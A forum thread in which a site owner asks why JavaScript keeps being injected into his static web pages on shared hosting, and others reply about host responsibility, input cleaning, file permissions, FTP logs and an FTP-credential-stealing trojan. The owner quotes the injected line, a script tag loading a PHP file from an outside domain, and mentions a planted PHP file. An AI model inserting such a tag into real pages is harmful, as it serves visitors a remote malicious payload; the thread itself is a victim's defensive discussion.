Is Shared WebHosting A Security Risk

11 replies
This is a second time this year I got automatic addition of java script coding inside my web pages, it automatically creat one php file inside images folder too. May I know how to prevent and solve this problem and what is a role of hosting companies in said sitauation.
#risk #security #shared #webhosting
  • Profile picture of the author TristanPerry
    Shared hosting in itself isn't a risk. Any proper shared host will secure the servers as necessary.

    Beyond that, are you sure that you aren't running any insecure applications? Are all your software installs up to date?

    It's a bit too difficult to answer your first question since there's thousands of different reasons why this may have happened. It could be the client's fault, or it could be the host's fault.

    To answer your last question - a host's security responsibility is in-part to have a secure server and to ensure that the various accounts cannot affect each-other's files etc.

    But keeping scripts up to date and all is the client's responsibility.
    Signature
    Plagiarism Guard - Protect Against Content Theft
    {{ DiscussionBoard.errors[1290448].message }}
  • Profile picture of the author mywebwork
    As Tristan correctly pointed out Shared Hosting itself isn't a greater security risk, a properly setup and maintained Apache virtual server can be made quite secure. However there are other factors that can make Shared Hosting plans less reliable, all of them due to the "shared" aspect of the arrangement.

    The biggest concerns with shared hosting are regarding who exactly you are sharing it with! You share a common IP address, so if one of the domains on your server does something spammy, unethical or downright illegal your shared IP address could end up on a few blacklists. This would affect things like e-mail deliverability if you use your own mail servers. Another concern is that one or two of the sites you share services with could eat up the majority of the bandwidth or CPU cycles, making your site slow and nonresponse. As Google is now starting to consider response time in its ranking of sites this could hurt you in more ways than one.

    A site like this one can show you who your "neighbors" are on your hosting plan. Just enter your domain name and see who else shares the same IP address as you:

    myIPneighbors.com Reverse IP Lookup & Domain Check DNS Tool

    Bill
    {{ DiscussionBoard.errors[1290512].message }}
  • Profile picture of the author n7 Studios
    Check all of your scripts that are on your web site immediately. If they're downloaded, check for available updates. Check file permissions, or get someone else to look at this if you don't understand.

    One or more of those has a vulnerability which someone has exploited to be able to write files to your web host. Leave this unfixed, and the chances are they'll be able to do much worse now they know how to access parts of your web site.
    {{ DiscussionBoard.errors[1294367].message }}
  • Profile picture of the author nRehman
    Thanks for all of you, its really great to have your suggessions and views.. as far as scripts and files, I have already blocked my blog and directory.. I am only talking about the static pages that contain just one application form about that I dont have any doubt. Moreover, I refreshed my static web pages with the new uploaded files but this time the illegal java script again appeared but have changed its url.

    Anyways, question is this where it has rooted it self. Have you any adea.
    {{ DiscussionBoard.errors[1298236].message }}
  • Profile picture of the author SimonFairbairn
    If you have any upload, contact form or any other way of anonymous users adding data to your website then you need to make sure that it's thoroughly cleaned before you accept it. Any data that you are accepting from users - even just a simple contact form - needs to be treated with utmost suspicion as it's just not to be trusted.

    What's this application form you are talking about? A simple textarea is enough for someone to get some malicious code on your page if you're not cleaning it properly.

    If someone's placed a malicious script on your site, it could be anywhere. You'll need to go through your entire site directory - making sure that you are able to see all hidden files and folders - and look for something that doesn't look right.

    If you have a database, you'll need to go through all of the entries on that as well.

    Unfortunately, it's not the host's responsibility to make sure that your pages are properly secured, so they'll probably not be much help.

    Si
    {{ DiscussionBoard.errors[1301230].message }}
  • Profile picture of the author ninjawarrior
    Did you create those static files yourself, maybe using some sort of html editor perhaps. Some html editors include some javascript when you create html pages and some of them don't easily show up as javascript when you're in edit mode.

    Or perhaps somebody else made those pages for you and whatever that javascript is, it's supposed to enhance the page somehow.

    If you can provide more information regarding the javascript that gets included into your files that you speak of, somebody might be able to help you regarding your specific problem.

    Unless you're using FREE shared hosting, the javascript that gets auto included into your pages isn't normal practice nowadays by most shared hosting providers. Geocities used to do this, but that's an era of the internet that's way beyond what we'd call ancient history now.

    Hope this helps.
    {{ DiscussionBoard.errors[1302195].message }}
  • Profile picture of the author nRehman
    The problem that I am getting is called a "script injection", said website is online from 5 to 6 years, I have a clean copy here on my computer which stays always in a secure atmosphere, when I upload files to the server.. these files stay clean for few hours without any problem with those.

    Anyway, it embed different urls after every fresh upload before the body tag, this time it embeds:

    <script src=http://jvaflash.com/images/postinfo.php ></script>

    it also made one file into my "images" folder named "gifimg.php"

    Moreover, this problem was first seen in last may, but when I uploaded new fresh copy it was gone till now, but now its not working.

    Do you think, it may also be a problem of a database, because I am not sure but it started after building my blog with my domain.

    I also took a new hosting platform but when I uploaded it only take 24 hours to initiate its injection process with in 10 seconds to reach my four sites on this server.
    {{ DiscussionBoard.errors[1319469].message }}
    • Profile picture of the author Gary Smith
      I don't suppose you're using FileZilla? It seems to be getting hit pretty hard recently by a trojan that grabs the ftp login details and then uses them to modify some of your files (it seems to be mainly index.php and index.html). I had a customer recently with 50-60 websites infected by this.

      It's a trojan on the PC that grabs those ftp login details and FileZilla don't have any plans to change the way ftp credentials are stored (they are currently stored in an unencrypted state). More info here:

      FileZilla Security Alert - Hacker Exploit Through Trojan | Tech-Evangelist
      Signature

      Gary Smith

      PHP Developer and aging geek

      {{ DiscussionBoard.errors[1321303].message }}
  • Profile picture of the author HomeComputerGames
    It sounds like your directory system needs locked down. By setting the correct permissions on your server you can insure that no one but you can make any modifications.

    Also, checking the ftp logs will tell you if your account has been compromised.
    You web server logs will tell you a lot about what is going on.

    It sounds like your form is the most likely culprit. That can be easily fixed but would need to see what the code is doing first.

    If you haven't got it sorted yet PM me and we'll see what we can work out.

    Ken
    Signature

    yes, I am....

    {{ DiscussionBoard.errors[1327491].message }}
    • Profile picture of the author nRehman
      Originally Posted by HomeComputerGames View Post

      It sounds like your directory system needs locked down. By setting the correct permissions on your server you can insure that no one but you can make any modifications.

      Also, checking the ftp logs will tell you if your account has been compromised.
      You web server logs will tell you a lot about what is going on.

      It sounds like your form is the most likely culprit. That can be easily fixed but would need to see what the code is doing first.

      If you haven't got it sorted yet PM me and we'll see what we can work out.

      Ken
      Dear Ken, thanks for your help, I will definitely write you.. Anyway do you think FTP program like "WS_FTP Professional 2006" is safe to upload files because I mostly use it to upload my files.
      {{ DiscussionBoard.errors[1330576].message }}

Trending Topics